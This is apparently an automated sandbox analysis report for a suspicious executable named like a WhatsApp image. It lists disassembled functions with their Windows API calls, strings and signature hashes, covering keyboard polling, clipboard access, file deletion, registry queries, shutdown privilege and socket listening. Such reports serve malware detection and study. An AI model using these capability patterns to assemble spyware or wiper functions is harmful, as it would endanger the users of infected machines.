Part of subcall function 000BABBB: GetProcessHeap.KERNEL32(00000008,?,?,000BA69F,?,?,?), ref: 000BABF0
Part of subcall function 000BABBB: HeapAlloc.KERNEL32(00000000,?,000BA69F,?,?,?), ref: 000BABF7
Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BAC0E

Part of subcall function 000BAC56: GetProcessHeap.KERNEL32(00000008,000BA6B5,00000000,00000000,?,000BA6B5,?), ref: 000BAC62
Part of subcall function 000BAC56: HeapAlloc.KERNEL32(00000000,?,000BA6B5,?), ref: 000BAC69
Part of subcall function 000BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000BA6B5,?), ref: 000BAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000BA6D0
_memset.LIBCMT ref: 000BA6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000BA704
GetLengthSid.ADVAPI32(?), ref: 000BA715
GetAce.ADVAPI32(?,00000000,?), ref: 000BA752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000BA76E
GetLengthSid.ADVAPI32(?), ref: 000BA78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000BA79A
HeapAlloc.KERNEL32(00000000), ref: 000BA7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 000BA7C2
CopySid.ADVAPI32(00000000), ref: 000BA7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000BA7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000BA820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 000BA834

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: e2572fb780a3d85386e80cdbb14e4f526a47e6266e8d81b07461cdc6c3db4394
Instruction ID: ee5702ca2787a60b616c87b1f4a5a3e2e32b881135d045ad2d7a1c62a64423db
Opcode Fuzzy Hash: e2572fb780a3d85386e80cdbb14e4f526a47e6266e8d81b07461cdc6c3db4394
Instruction Fuzzy Hash: 08515A71A0020AABDF00DFA5DC45EEEBBB9FF09300F048129F915A7691DB749A46CB61

Function 00086F07 Relevance: 19.6, Strings: 15, Instructions: 883COMMON

Download Yara Rule

Strings

CR), xrefs: 00102E09
CRLF), xrefs: 00102E43
ANY), xrefs: 00102E60
806ddv806ddv806ddv806ddv806ddv866ddv866ddv886ddv896ddv886ddv856ddv8e6ddv826ddv8f6ddv8e6ddv8f6ddv8f6ddv8f6ddv8f6ddv8b6ddv896ddv866d, xrefs: 00102ECB
LF), xrefs: 00102E26
BSR_ANYCRLF), xrefs: 00102EA0
BSR_UNICODE), xrefs: 00102EBA
NO_START_OPT), xrefs: 00102CD1
NO_AUTO_POSSESS), xrefs: 00102CB0
UCP), xrefs: 00102C8F
UTF), xrefs: 00102C7C
LIMIT_RECURSION=, xrefs: 00102D7E
ANYCRLF), xrefs: 00102E7D
UTF16), xrefs: 00102C56
LIMIT_MATCH=, xrefs: 00102CF2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID: 806ddv806ddv806ddv806ddv806ddv866ddv866ddv886ddv896ddv886ddv856ddv8e6ddv826ddv8f6ddv8e6ddv8f6ddv8f6ddv8f6ddv8f6ddv8b6ddv896ddv866d$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-886720710
Opcode ID: 1c22304cbd5ce71578df01328c2caeee32e7e2b8aafab6f89d210f6be35bfc5e
Instruction ID: 7a61442f97bf6c1c7a49e3db6d7e6bc3690ee24bf41d2d4e04a56ceef693dffb
Opcode Fuzzy Hash: 1c22304cbd5ce71578df01328c2caeee32e7e2b8aafab6f89d210f6be35bfc5e
Instruction Fuzzy Hash: F5727371E04219DBDF24DF98C8407EEB7B5BF48310F24816AE999EB285DB709E41DB90

Function 000C63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8

Part of subcall function 000C72CB: GetFileAttributesW.KERNEL32(?,000C6019), ref: 000C72CC

_wcscat.LIBCMT ref: 000C6441
__wsplitpath.LIBCMT ref: 000C645F
FindFirstFileW.KERNEL32(?,?), ref: 000C6474
_wcscpy.LIBCMT ref: 000C64A3
_wcscat.LIBCMT ref: 000C64B8
_wcscat.LIBCMT ref: 000C64CA
DeleteFileW.KERNEL32(?), ref: 000C64DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 000C64EB
FindClose.KERNEL32(00000000), ref: 000C6506

Strings

\*.*, xrefs: 000C643B

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: d2c228beac4376225508e4eb424b9e8f3f530bfda923b660da86f2fdbe608437
Instruction ID: d985a5a01471a540b5a024935cc5ac737d8a1b66a50f79bf5b90fc31466f18fc
Opcode Fuzzy Hash: d2c228beac4376225508e4eb424b9e8f3f530bfda923b660da86f2fdbe608437
Instruction Fuzzy Hash: 123144B24083889AC731EBE48885EDFB7DCAF56310F44491EF5D9C3142EA36D5498767

Function 000E31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2BB5,?,?), ref: 000E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E328E

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000E332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000E33C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 000E3604
RegCloseKey.ADVAPI32(00000000), ref: 000E3611

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 2d7c9d6e43dfea8856d1b006980348119cbd62eecaf2abc3fe22a6847a30975c
Instruction ID: 584ea542f2ac99493dbb18ab0ff2639d66f12859f7f9b0bc8d679974b8845ccb
Opcode Fuzzy Hash: 2d7c9d6e43dfea8856d1b006980348119cbd62eecaf2abc3fe22a6847a30975c
Instruction Fuzzy Hash: 7DE14D71604200AFCB15EF29C895E6ABBE4FF88714F04856DF48AD72A2DB30EA05CB51

Function 000C2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 000C2B5F
GetAsyncKeyState.USER32(000000A0), ref: 000C2BE0
GetKeyState.USER32(000000A0), ref: 000C2BFB
GetAsyncKeyState.USER32(000000A1), ref: 000C2C15
GetKeyState.USER32(000000A1), ref: 000C2C2A
GetAsyncKeyState.USER32(00000011), ref: 000C2C42
GetKeyState.USER32(00000011), ref: 000C2C54
GetAsyncKeyState.USER32(00000012), ref: 000C2C6C
GetKeyState.USER32(00000012), ref: 000C2C7E
GetAsyncKeyState.USER32(0000005B), ref: 000C2C96
GetKeyState.USER32(0000005B), ref: 000C2CA8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 152d1c2d5ff6c710c82cff90c2bf10f8a7bc5eaa11add3dcae56f020ab4ade64
Instruction ID: 5a832d20bec3e645a43513bd39c1438acfc43ee563b877ffcc40cea664a542a9
Opcode Fuzzy Hash: 152d1c2d5ff6c710c82cff90c2bf10f8a7bc5eaa11add3dcae56f020ab4ade64
Instruction Fuzzy Hash: CC41D4305047C96EFFB4AB608844BADBEE06B11304F04805DD9C656AC2DBE49DC8C7A2

Function 000D6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 000D6D2E
EmptyClipboard.USER32 ref: 000D6D34
GlobalAlloc.KERNEL32(00000002,?), ref: 000D6D49
CloseClipboard.USER32 ref: 000D6DE8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: d68ddd79950484310a78aa8edca6e35ea9042267b32f69c6fbf3732b1877500a
Instruction ID: 891d730576f5b87f00b47d2e3c4cbfd55ed56a95c349e44b47c3bbd6efc2b972
Opcode Fuzzy Hash: d68ddd79950484310a78aa8edca6e35ea9042267b32f69c6fbf3732b1877500a
Instruction Fuzzy Hash: 1721A131700214AFDB11AFA4EC49F6D77A9FF04710F04801AF98ADB262CB72ED418B61

Function 000DC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 000B9ABF: CLSIDFromProgID.OLE32 ref: 000B9ADC
Part of subcall function 000B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 000B9AF7
Part of subcall function 000B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 000B9B05
Part of subcall function 000B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000B9B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 000DC235
_memset.LIBCMT ref: 000DC242
_memset.LIBCMT ref: 000DC360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 000DC38C
CoTaskMemFree.OLE32(?), ref: 000DC397

Strings

NULL Pointer assignment, xrefs: 000DC3E5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 0edf449b9c822716f5d326044a6d220fb646a4557ff78d1dd62abd84276787ab
Instruction ID: 3d1e9538031a224e6e47265f9e6cfcd86442da4a874cb6f0f09363dd52513b42
Opcode Fuzzy Hash: 0edf449b9c822716f5d326044a6d220fb646a4557ff78d1dd62abd84276787ab
Instruction Fuzzy Hash: E9913C71D00219ABDB10DFA4DC95EDEBBB9FF08710F10815AF515A7282EB719A45CFA0

Function 000C79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BB180
Part of subcall function 000BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BB1AD
Part of subcall function 000BB134: GetLastError.KERNEL32 ref: 000BB1BA

ExitWindowsEx.USER32(?,00000000), ref: 000C7A0F

Strings

, xrefs: 000C79FD
@, xrefs: 000C7A02
SeShutdownPrivilege, xrefs: 000C79DD

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 5a1e262dc4657b631ec4dedeeee87272a643b67e34ced5d48db3d6a46d6b0935
Instruction ID: 71284d63fa56042ef72b6cfc583678fff12cd63b594099d103021e1959cf4fb7
Opcode Fuzzy Hash: 5a1e262dc4657b631ec4dedeeee87272a643b67e34ced5d48db3d6a46d6b0935
Instruction Fuzzy Hash: D701D4716582116AF76C27B89C4AFBF32989B40340F14082CF95BA20D2D6A09E0089A6

Function 000D8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000D8CA8
WSAGetLastError.WSOCK32(00000000), ref: 000D8CB7
bind.WSOCK32(00000000,?,00000010), ref: 000D8CD3
listen.WSOCK32(00000000,00000005), ref: 000D8CE2
WSAGetLastError.WSOCK32(00000000), ref: 000D8CFC
closesocket.WSOCK32(00000000,00000000), ref: 000D8D10

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: f03af0d513f688e570a3fb93d22acac0de13ce3ad32fcc260cecf02b83b8cd5f
Instruction ID: a55719ee9f70661589468afa9db3b36cf3e95e6d86a68ad7cd024a83aa544aad
Opcode Fuzzy Hash: f03af0d513f688e570a3fb93d22acac0de13ce3ad32fcc260cecf02b83b8cd5f
Instruction Fuzzy Hash: A921B131600200EFCB10EF68DD45BAEB7E9EF48714F148159F956A73D2CB70AD419B61

Function 000C6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C6554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 000C6564
Process32NextW.KERNEL32(00000000,0000022C), ref: 000C6583
__wsplitpath.LIBCMT ref: 000C65A7
_wcscat.LIBCMT ref: 000C65BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 000C65F9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 45f821d77d1d0f79f305f550290d673c178ac9a5c81520f3a6c2d2b17c32bf4e
Instruction ID: 45e7f6f379e2fefbc329237ef5dc9e2f57e327b94e852ec4b79cb6203d035057
Opcode Fuzzy Hash: 45f821d77d1d0f79f305f550290d673c178ac9a5c81520f3a6c2d2b17c32bf4e
Instruction Fuzzy Hash: B721A771900218ABDB20ABE4DC88FDDB7FCAB09300F6000A9F545E7141DBB19F85CB61

Function 00089B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00089E95
ERCP, xrefs: 00089C32
VUUU, xrefs: 00089ED4
VUUU, xrefs: 00089EA7
VUUU, xrefs: 0010BE14
806ddv806ddv806ddv806ddv806ddv866ddv866ddv886ddv896ddv886ddv856ddv8e6ddv826ddv8f6ddv8e6ddv8f6ddv8f6ddv8f6ddv8f6ddv8b6ddv896ddv866d, xrefs: 0010BD23

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID: 806ddv806ddv806ddv806ddv806ddv866ddv866ddv886ddv896ddv886ddv856ddv8e6ddv826ddv8f6ddv8e6ddv8f6ddv8f6ddv8f6ddv8f6ddv8b6ddv896ddv866d$ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-741922438
Opcode ID: 8557e976b7135155614de23337b9e7e4bc78fe9f90e25489c5191ce392886f6b
Instruction ID: 8ae9b8a4289cbc0dddfaf8987d81b6127bb9b5c328a1be474e510eb55524b670
Opcode Fuzzy Hash: 8557e976b7135155614de23337b9e7e4bc78fe9f90e25489c5191ce392886f6b
Instruction Fuzzy Hash: F992A271E0021ACBEF34EF58C8807BDB7B1BB54314F1482AAE996A7681D7719D81CF91

Function 000D923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000DA84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 000D9296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 000D92B9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 57fef618c98be5d3848782fda18f0d8d374f31febc50040381817485672c2c26
Instruction ID: 59d2dc17e73a04dbf525aba01864885dff51312c7fea97cb9b4896f1916014fa
Opcode Fuzzy Hash: 57fef618c98be5d3848782fda18f0d8d374f31febc50040381817485672c2c26
Instruction Fuzzy Hash: 1341C070600200AFDB14BB68CC82EBE77EDEF44728F044459F956AB383DB749E419BA1

Function 000CEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000CEB8A
_wcscmp.LIBCMT ref: 000CEBBA
_wcscmp.LIBCMT ref: 000CEBCF
FindNextFileW.KERNEL32(00000000,?), ref: 000CEBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 000CEC0E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: b5e5f3eaa43013ff86079befb2a2d66c069326622dd7360c1d491bff0fd23628
Instruction ID: fdb0d4ef1403e3339506f1b5635473680195d7be455042ac72acbf863f24fbf8
Opcode Fuzzy Hash: b5e5f3eaa43013ff86079befb2a2d66c069326622dd7360c1d491bff0fd23628
Instruction Fuzzy Hash: D941AC75600602DFCB18DF68C491EAEB7E4FF49324F10455DE96A8B3A2DB31E981CB91

Function 000E8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 000E8160
IsWindowEnabled.USER32 ref: 000E816E
GetForegroundWindow.USER32(?,?,00000001), ref: 000E817B
IsIconic.USER32 ref: 000E8189
IsZoomed.USER32 ref: 000E8197

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 47484fd5caa5a3f0177884d4f97ef7432ea5224adab9118e1aa0cd93268dbde8
Instruction ID: b152fbaf27c53c4731fedc76568b277f93aa82606d7d94e4e8cc837b0e73eec8
Opcode Fuzzy Hash: 47484fd5caa5a3f0177884d4f97ef7432ea5224adab9118e1aa0cd93268dbde8
Instruction Fuzzy Hash: 3411BF31300250AFE7216F66EC44E6FBB9DEF84760B058469F88DE7242CF70E94287A0

Function 0009E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0009E014,74DF0AE0,0009DEF1,0011DC38,?,?), ref: 0009E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0009E03E

Strings

GetNativeSystemInfo, xrefs: 0009E038
kernel32.dll, xrefs: 0009E027

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: a477f7dce2030742f192c92c7535ca7ec09638a1ec068c6ad232bcfe476f05ce
Instruction ID: 55a8f19c375d22b00fae1e3d6b2fb080b21af6aa970aa9d6a46e016d9b21d5b2
Opcode Fuzzy Hash: a477f7dce2030742f192c92c7535ca7ec09638a1ec068c6ad232bcfe476f05ce
